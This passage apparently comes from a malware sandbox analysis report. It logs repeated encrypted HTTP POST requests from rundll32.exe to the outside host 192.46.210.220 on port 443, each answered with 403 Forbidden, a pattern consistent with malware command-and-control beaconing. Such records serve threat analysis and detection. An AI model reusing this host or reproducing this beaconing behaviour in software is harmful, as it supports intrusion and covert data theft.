                                                                                                        2021-10-28 02:45:47 UTC104OUTData Raw: 56 90 ae c0 10 0e 23 ac 57 b0 5e a3 42 68 1d 97 e3 ac 25 fc ae ff f0 4a 07 14 83 c0 8c 5c 90 48 f1 f1 eb 32 61 05 8f e1 96 fa fc bb d6 4a 9a 8d f8 e0 2a 3e 95 0d 1f 4a 0d 7c de 5a 21 46 78 a7 6f fa 93 06 43 f5 6b 92 0b ee 8d 31 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: V#W^Bh%J\H2aJ*>J|Z!FxoCk1k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:45:48 UTC109INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:45:48 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        22192.168.2.549841192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:45:48 UTC109OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4832
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:45:48 UTC109OUTData Raw: 13 4a 53 30 10 0e 23 ac 57 b0 5e a3 42 68 1d 97 e3 ac 25 fc ae ff f0 4a 07 14 83 c0 8c 5c 90 48 f1 f1 eb 32 61 05 8f e1 96 fa fc bb d6 4a 9a 8d f8 e0 2a 3e 95 0d 1f 4a 0d 7c de 5a 21 46 78 a7 6f fa 93 06 43 f5 6b 92 0b ee 8d 31 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: JS0#W^Bh%J\H2aJ*>J|Z!FxoCk1kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:45:49 UTC114INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:45:49 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        23192.168.2.549847192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:45:52 UTC114OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4844
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:45:52 UTC114OUTData Raw: 56 90 ae c0 10 0e 23 ac 57 b0 5e a3 42 68 1d 97 e3 ac 25 fc ae ff f0 4a 07 14 83 c0 8c 5c 90 48 f1 f1 eb 32 61 05 8f e1 96 fa fc bb d6 4a 9a 8d f8 e0 2a 3e 95 0d 1f 4a 0d 7c de 5a 21 46 78 a7 6f fa 93 06 43 f5 6b 92 0b ee 8d 31 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: V#W^Bh%J\H2aJ*>J|Z!FxoCk1k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:45:53 UTC124INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:45:53 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        24192.168.2.549851192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:45:53 UTC119OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4832
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:45:53 UTC119OUTData Raw: 13 4a 53 30 10 0e 23 ac 57 b0 5e a3 42 68 1d 97 e3 ac 25 fc ae ff f0 4a 07 14 83 c0 8c 5c 90 48 f1 f1 eb 32 61 05 8f e1 96 fa fc bb d6 4a 9a 8d f8 e0 2a 3e 95 0d 1f 4a 0d 7c de 5a 21 46 78 a7 6f fa 93 06 43 f5 6b 92 0b ee 8d 31 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: JS0#W^Bh%J\H2aJ*>J|Z!FxoCk1kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:45:53 UTC124INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:45:53 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        25192.168.2.549857192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:45:56 UTC124OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4844
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:45:56 UTC124OUTData Raw: 56 90 ae c0 10 0e 23 ac 57 b0 5e a3 42 68 1d 97 e3 ac 25 fc ae ff f0 4a 07 14 83 c0 8c 5c 90 48 f1 f1 eb 32 61 05 8f e1 96 fa fc bb d6 4a 9a 8d f8 e0 2a 3e 95 0d 1f 4a 0d 7c de 5a 21 46 78 a7 6f fa 93 06 43 f5 6b 92 0b ee 8d 31 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: V#W^Bh%J\H2aJ*>J|Z!FxoCk1k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:45:56 UTC133INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:45:56 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        26192.168.2.549859192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:45:56 UTC129OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4832
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:45:56 UTC129OUTData Raw: 13 4a 53 30 10 0e 23 ac 57 b0 5e a3 42 68 1d 97 e3 ac 25 fc ae ff f0 4a 07 14 83 c0 8c 5c 90 48 f1 f1 eb 32 61 05 8f e1 96 fa fc bb d6 4a 9a 8d f8 e0 2a 3e 95 0d 1f 4a 0d 7c de 5a 21 46 78 a7 6f fa 93 06 43 f5 6b 92 0b ee 8d 31 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: JS0#W^Bh%J\H2aJ*>J|Z!FxoCk1kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:45:57 UTC134INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:45:57 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        27192.168.2.549865192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:46:00 UTC134OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4844
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:46:00 UTC134OUTData Raw: 56 90 ae c0 10 0e 23 ac 57 b0 5e a3 42 68 1d 97 e3 ac 25 fc ae ff f0 4a 07 14 83 c0 8c 5c 90 48 f1 f1 eb 32 61 05 8f e1 96 fa fc bb d6 4a 9a 8d f8 e0 2a 3e 95 0d 1f 4a 0d 7c de 5a 21 46 78 a7 6f fa 93 06 43 f5 6b 92 0b ee 8d 31 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: V#W^Bh%J\H2aJ*>J|Z!FxoCk1k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:46:00 UTC143INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:46:00 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        28192.168.2.549872192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:46:00 UTC139OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4832
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:46:00 UTC139OUTData Raw: 13 4a 53 30 10 0e 23 ac 57 b0 5e a3 42 68 1d 97 e3 ac 25 fc ae ff f0 4a 07 14 83 c0 8c 5c 90 48 f1 f1 eb 32 61 05 8f e1 96 fa fc bb d6 4a 9a 8d f8 e0 2a 3e 95 0d 1f 4a 0d 7c de 5a 21 46 78 a7 6f fa 93 06 43 f5 6b 92 0b ee 8d 31 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: JS0#W^Bh%J\H2aJ*>J|Z!FxoCk1kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:46:01 UTC144INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:46:01 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        29192.168.2.549878192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:46:03 UTC144OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4844
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:46:03 UTC144OUTData Raw: 56 90 ae c0 10 0e 23 ac 57 b0 5e a3 42 68 1d 97 e3 ac 25 fc ae ff f0 4a 07 14 83 c0 8c 5c 90 48 f1 f1 eb 32 61 05 8f e1 96 fa fc bb d6 4a 9a 8d f8 e0 2a 3e 95 0d 1f 4a 0d 7c de 5a 21 46 78 a7 6f fa 93 06 43 f5 6b 92 0b ee 8d 31 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: V#W^Bh%J\H2aJ*>J|Z!FxoCk1k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:46:04 UTC153INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:46:04 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        3192.168.2.549768192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:45:11 UTC14OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4832
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:45:11 UTC15OUTData Raw: 13 4a 53 30 10 0e 23 ac 57 b0 5e a3 42 68 1d 97 e3 ac 25 fc ae ff f0 4a 07 14 83 c0 8c 5c 90 48 f1 f1 eb 32 61 05 8f e1 96 fa fc bb d6 4a 9a 8d f8 e0 2a 3e 95 0d 1f 4a 0d 7c de 5a 21 46 78 a7 6f fa 93 06 43 f5 6b 92 0b ee 8d 31 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: JS0#W^Bh%J\H2aJ*>J|Z!FxoCk1kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:45:12 UTC24INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:45:12 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        30192.168.2.549880192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:46:04 UTC149OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4832
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:46:04 UTC149OUTData Raw: 13 4a 53 30 10 0e 23 ac 57 b0 5e a3 42 68 1d 97 e3 ac 25 fc ae ff f0 4a 07 14 83 c0 8c 5c 90 48 f1 f1 eb 32 61 05 8f e1 96 fa fc bb d6 4a 9a 8d f8 e0 2a 3e 95 0d 1f 4a 0d 7c de 5a 21 46 78 a7 6f fa 93 06 43 f5 6b 92 0b ee 8d 31 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: JS0#W^Bh%J\H2aJ*>J|Z!FxoCk1kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:46:05 UTC153INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:46:05 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        31192.168.2.549887192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:46:07 UTC154OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4844
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:46:07 UTC154OUTData Raw: 56 90 ae c0 10 0e 23 ac 57 b0 5e a3 42 68 1d 97 e3 ac 25 fc ae ff f0 4a 07 14 83 c0 8c 5c 90 48 f1 f1 eb 32 61 05 8f e1 96 fa fc bb d6 4a 9a 8d f8 e0 2a 3e 95 0d 1f 4a 0d 7c de 5a 21 46 78 a7 6f fa 93 06 43 f5 6b 92 0b ee 8d 31 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: V#W^Bh%J\H2aJ*>J|Z!FxoCk1k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:46:08 UTC163INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:46:08 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        32192.168.2.549889192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:46:08 UTC158OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4832
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:46:08 UTC159OUTData Raw: 13 4a 53 30 10 0e 23 ac 57 b0 5e a3 42 68 1d 97 e3 ac 25 fc ae ff f0 4a 07 14 83 c0 8c 5c 90 48 f1 f1 eb 32 61 05 8f e1 96 fa fc bb d6 4a 9a 8d f8 e0 2a 3e 95 0d 1f 4a 0d 7c de 5a 21 46 78 a7 6f fa 93 06 43 f5 6b 92 0b ee 8d 31 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: JS0#W^Bh%J\H2aJ*>J|Z!FxoCk1kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:46:09 UTC163INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:46:09 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        33192.168.2.549896192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:46:12 UTC164OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4844
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
